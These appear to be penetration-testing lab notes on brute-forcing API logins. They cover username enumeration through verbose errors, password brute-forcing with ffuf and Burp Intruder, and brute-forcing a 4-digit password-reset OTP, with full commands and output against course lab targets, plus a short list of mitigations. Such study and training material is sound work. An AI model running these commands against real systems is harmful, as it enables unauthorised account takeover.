BFAs

A Brute Force Attack (BFA) involves systematically trying all possible combinations of credentials (e.g., passwords) or encryption keys until the correct one is found.

This can lead to unauthorized access to accounts or systems if strong security measures are not in place, as attackers can eventually guess or discover the correct credential.

Implement account lockout mechanisms after a number of failed attempts, use multi-factor authentication (MFA), enforce strong password policies, and apply rate limiting or CAPTCHA to prevent rapid, repeated login attempts.

Passwords

The below example is based on TCM's Practical API Hacking course.

We might be able to enumerate valid usernames via verbose error messages (Figure 1).

Figure 1: Enumerating a valid username based on verbose error messages.

When a valid username is obtained, we can try brute-forcing its password using Burp's Intruder (Figure 2) or CLI tools, such as ffuf.

Figure 2: Brute-forcing admin's password with Intruder.

# Brute-forcing admin's password with ffuf
$ ffuf -u http://localhost:9000/v1/verify.php -w /usr/share/wordlists/rockyou:PASS -X POST -H 'Content-Type: application/json' -d '{"email":"admin","password":"PASS"}' -c -fc 401

Based on the above verbose error message (Invalid password) we can try to enumerate more valid users (Figure 3), and if other users are found, we can repeat the above process to enumerate their passwords (Figure 4).

Figure 3: Fuzzing for other valid users based on the verbose error message.

# Fuzzing for other valid users based on the verbose error message.
$ ffuf -u http://localhost:9000/v1/verify.php -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt:USER -X POST -H 'Content-Type: application/json' -d '{
"email":"USER","password":"admin"}' -c -mr "Invalid password!"

________________________________________________
jeremy                  [Status: 401, Size: 31, Words: 2, Lines: 1, Duration: 0ms]
admin                   [Status: 401, Size: 31, Words: 2, Lines: 1, Duration: 265ms]

Figure 4: Fuzzing jeremy's password with Intruder.

# Brute-forcing jeremy's password with ffuf
$ ffuf -u http://localhost:9000/v1/verify.php -w /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-100000.txt:PASS -X POST -H 'Content-Type: application/json' -d '{"email":"jeremy","password":"PASS"}' -c -mc 200

OTPs

The below example is based on HTB's API Attacks module.

If the password policy is robust enough, we can check if the password reset functionality is vulnerable to BFAs due to weak One Time Passcodes (OTPs) (Figure 5).

Figure 5: Getting the required information for brute-forcing the OTP

# Brute-forcing the OTP
$ ffuf -u http://94.237.59.199:45348/api/v1/authentication/customers/passwords/resets -X POST -H 'Content-Type: application/json' -w /usr/share/wordlists/seclists/Fuzzing/4-digits-0000-9999.txt:FUZZ -d '{"Email": "MasonJenkins@ymail.com","OTP": "FUZZ","NewPassword": "123456"}' -ac -c -fr ":false" -t 100

0426                    [Status: 200, Size: 22, Words: 1, Lines: 1, Duration: 40ms]

Figure 6: Successfully logging in.